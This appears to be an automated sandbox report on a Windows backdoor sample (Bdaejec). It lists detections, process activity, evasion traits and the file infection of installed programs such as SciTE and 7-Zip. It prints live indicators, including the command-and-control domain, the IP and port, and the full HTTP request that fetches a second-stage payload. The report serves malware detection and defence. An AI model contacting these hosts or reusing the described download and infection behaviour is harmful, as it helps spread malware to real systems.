Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
gT6IitwToH.exe

Overview

General Information

Sample name:gT6IitwToH.exe
renamed because original name is a hash value
Original sample name:8da10c130681fd03a6b64ad9a827a433.exe
Analysis ID:1581652
MD5:8da10c130681fd03a6b64ad9a827a433
SHA1:55be25e240ff1eebca02e9db0f9cec91f03729c3
SHA256:45c750869e31ed836f892cb85fe2d968146a3ae10261f1e28cef8e61b8265f55
Tags:backdoorexeuser-zhuzhu0009
Infos:

Detection

Bdaejec
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Bdaejec
AI detected suspicious sample
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)

Classification

  • System is w10x64
  • gT6IitwToH.exe (PID: 5924 cmdline: "C:\Users\user\Desktop\gT6IitwToH.exe" MD5: 8DA10C130681FD03A6B64AD9A827A433)
    • IivJTsFD.exe (PID: 4908 cmdline: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe MD5: 56B2C3810DBA2E939A8BB9FA36D3CF96)
      • WerFault.exe (PID: 1860 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 1392 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: IivJTsFD.exe PID: 4908JoeSecurity_BdaejecYara detected BdaejecJoe Security
    No Sigma rule has matched
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-28T12:23:59.200458+010028079081Malware Command and Control Activity Detected192.168.2.44973044.221.84.105799TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-28T12:23:57.549164+010028385221Malware Command and Control Activity Detected192.168.2.4651031.1.1.153UDP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: gT6IitwToH.exeAvira: detected
    Source: http://ddos.dnsnb8.net:799/cj//k1.rarNAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k1.rar9Avira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net/?llAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net/6lkAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k1.rarAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k1.rarWAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k1.rarhAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k1.rarcC:Avira URL Cloud: Label: malware
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeAvira: detection malicious, Label: TR/Dldr.Small.Z.haljq
    Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Jadtre.B
    Source: C:\Program Files\7-Zip\Uninstall.exeAvira: detection malicious, Label: W32/Jadtre.B
    Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeAvira: detection malicious, Label: W32/Jadtre.B
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeReversingLabs: Detection: 97%
    Source: gT6IitwToH.exeVirustotal: Detection: 88%Perma Link
    Source: gT6IitwToH.exeReversingLabs: Detection: 97%
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeJoe Sandbox ML: detected
    Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
    Source: C:\Program Files\7-Zip\Uninstall.exeJoe Sandbox ML: detected
    Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJoe Sandbox ML: detected
    Source: gT6IitwToH.exeJoe Sandbox ML: detected
    Source: gT6IitwToH.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr

    Spreading

    barindex
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeCode function: 1_2_002529E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,1_2_002529E2
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeCode function: 1_2_00252B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,1_2_00252B8C

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2838522 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup : 192.168.2.4:65103 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2807908 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin : 192.168.2.4:49730 -> 44.221.84.105:799
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 799
    Source: global trafficTCP traffic: 192.168.2.4:49730 -> 44.221.84.105:799
    Source: Joe Sandbox ViewIP Address: 44.221.84.105 44.221.84.105
    Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeCode function: 1_2_00251099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep,1_2_00251099
    Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
    Source: global trafficDNS traffic detected: DNS query: ddos.dnsnb8.net
    Source: IivJTsFD.exe, 00000001.00000003.1653432103.00000000011E0000.00000004.00001000.00020000.00000000.sdmp, IivJTsFD.exe, 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
    Source: IivJTsFD.exe, 00000001.00000003.1673168646.0000000000F31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net/6lk
    Source: IivJTsFD.exe, 00000001.00000003.1673168646.0000000000F31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net/?ll
    Source: IivJTsFD.exe, 00000001.00000003.1673168646.0000000000F31000.00000004.00000020.00020000.00000000.sdmp, IivJTsFD.exe, 00000001.00000003.1673168646.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, IivJTsFD.exe, 00000001.00000002.1948509714.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp, IivJTsFD.exe, 00000001.00000002.1948793448.000000000130A000.00000004.00000010.00020000.00000000.sdmp, IivJTsFD.exe, 00000001.00000002.1948509714.0000000000F31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
    Source: IivJTsFD.exe, 00000001.00000002.1948509714.0000000000ECE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar9
    Source: IivJTsFD.exe, 00000001.00000003.1673168646.0000000000F31000.00000004.00000020.00020000.00000000.sdmp, IivJTsFD.exe, 00000001.00000002.1948509714.0000000000F31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarN
    Source: IivJTsFD.exe, 00000001.00000002.1948509714.0000000000ECE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarW
    Source: IivJTsFD.exe, 00000001.00000003.1673168646.0000000000F6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarcC:
    Source: IivJTsFD.exe, 00000001.00000002.1948793448.000000000130A000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarh
    Source: Amcache.hve.1.drString found in binary or memory: http://upx.sf.net
    Source: SciTE.exe.1.drString found in binary or memory: http://www.activestate.com
    Source: SciTE.exe.1.drString found in binary or memory: http://www.activestate.comHolger
    Source: SciTE.exe.1.drString found in binary or memory: http://www.baanboard.com
    Source: SciTE.exe.1.drString found in binary or memory: http://www.baanboard.comBrendon
    Source: SciTE.exe.1.drString found in binary or memory: http://www.develop.com
    Source: SciTE.exe.1.drString found in binary or memory: http://www.develop.comDeepak
    Source: SciTE.exe.1.drString found in binary or memory: http://www.lua.org
    Source: SciTE.exe.1.drString found in binary or memory: http://www.rftp.com
    Source: SciTE.exe.1.drString found in binary or memory: http://www.rftp.comJosiah
    Source: SciTE.exe.1.drString found in binary or memory: http://www.scintilla.org
    Source: SciTE.exe.1.drString found in binary or memory: http://www.scintilla.org/scite.rng
    Source: SciTE.exe.1.drString found in binary or memory: http://www.spaceblue.com
    Source: SciTE.exe.1.drString found in binary or memory: http://www.spaceblue.comMathias
    Source: IivJTsFD.exe, 00000001.00000003.1673168646.0000000000F31000.00000004.00000020.00020000.00000000.sdmp, IivJTsFD.exe, 00000001.00000002.1948509714.0000000000F31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
    Source: SciTE.exe.1.drString found in binary or memory: https://www.smartsharesystems.com/
    Source: SciTE.exe.1.drString found in binary or memory: https://www.smartsharesystems.com/Morten
    Source: SciTE.exe.1.drBinary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \memstr_59130a50-7

    System Summary

    barindex
    Source: MyProg.exe.1.drStatic PE information: section name: Y|uR
    Source: IivJTsFD.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    Source: C:\Users\user\Desktop\gT6IitwToH.exeCode function: 0_2_00417B710_2_00417B71
    Source: C:\Users\user\Desktop\gT6IitwToH.exeCode function: 0_2_004073200_2_00407320
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeCode function: 1_2_002560761_2_00256076
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeCode function: 1_2_00256D001_2_00256D00
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe 4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
    Source: C:\Users\user\Desktop\gT6IitwToH.exeCode function: String function: 0040379C appears 31 times
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 1392
    Source: MyProg.exe.1.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
    Source: gT6IitwToH.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: IivJTsFD.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    Source: IivJTsFD.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    Source: IivJTsFD.exe.0.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
    Source: classification engineClassification label: mal100.spre.troj.evad.winEXE@5/11@1/1
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeCode function: 1_2_0025119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,1_2_0025119F
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k1[1].rarJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4908
    Source: C:\Users\user\Desktop\gT6IitwToH.exeFile created: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeJump to behavior
    Source: C:\Users\user\Desktop\gT6IitwToH.exeCommand line argument: Z@0_2_00405A30
    Source: C:\Users\user\Desktop\gT6IitwToH.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: gT6IitwToH.exeVirustotal: Detection: 88%
    Source: gT6IitwToH.exeReversingLabs: Detection: 97%
    Source: unknownProcess created: C:\Users\user\Desktop\gT6IitwToH.exe "C:\Users\user\Desktop\gT6IitwToH.exe"
    Source: C:\Users\user\Desktop\gT6IitwToH.exeProcess created: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe C:\Users\user\AppData\Local\Temp\IivJTsFD.exe
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 1392
    Source: C:\Users\user\Desktop\gT6IitwToH.exeProcess created: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe C:\Users\user\AppData\Local\Temp\IivJTsFD.exeJump to behavior
    Source: C:\Users\user\Desktop\gT6IitwToH.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeSection loaded: ntvdm64.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
    Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr

    Data Obfuscation

    barindex
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeUnpacked PE file: 1.2.IivJTsFD.exe.250000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
    Source: C:\Users\user\Desktop\gT6IitwToH.exeCode function: 0_2_00409607 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_00409607
    Source: initial sampleStatic PE information: section where entry point is pointing to: wu
    Source: gT6IitwToH.exeStatic PE information: section name: wu
    Source: IivJTsFD.exe.0.drStatic PE information: section name: .aspack
    Source: IivJTsFD.exe.0.drStatic PE information: section name: .adata
    Source: Uninstall.exe.1.drStatic PE information: section name: EpNuZ
    Source: MyProg.exe.1.drStatic PE information: section name: PELIB
    Source: MyProg.exe.1.drStatic PE information: section name: Y|uR
    Source: SciTE.exe.1.drStatic PE information: section name: u
    Source: C:\Users\user\Desktop\gT6IitwToH.exeCode function: 0_2_00416E7B push ebp; ret 0_2_00416E7E
    Source: C:\Users\user\Desktop\gT6IitwToH.exeCode function: 0_2_00416E85 push 00000000h; ret 0_2_00417296
    Source: C:\Users\user\Desktop\gT6IitwToH.exeCode function: 0_2_004037E1 push ecx; ret 0_2_004037F4
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeCode function: 1_2_00251638 push dword ptr [00253084h]; ret 1_2_0025170E
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeCode function: 1_2_0025600A push ebp; ret 1_2_0025600D
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeCode function: 1_2_00256014 push 002514E1h; ret 1_2_00256425
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeCode function: 1_2_00252D9B push ecx; ret 1_2_00252DAB
    Source: gT6IitwToH.exeStatic PE information: section name: wu entropy: 6.935243059177517
    Source: IivJTsFD.exe.0.drStatic PE information: section name: .text entropy: 7.81169422100848
    Source: Uninstall.exe.1.drStatic PE information: section name: EpNuZ entropy: 6.9345220483131635
    Source: MyProg.exe.1.drStatic PE information: section name: Y|uR entropy: 6.934118582299783
    Source: SciTE.exe.1.drStatic PE information: section name: u entropy: 6.934618219465227

    Persistence and Installation Behavior

    barindex
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeFile created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
    Source: C:\Users\user\Desktop\gT6IitwToH.exeFile created: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeJump to dropped file

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 799
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\IivJTsFD.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_1-1059
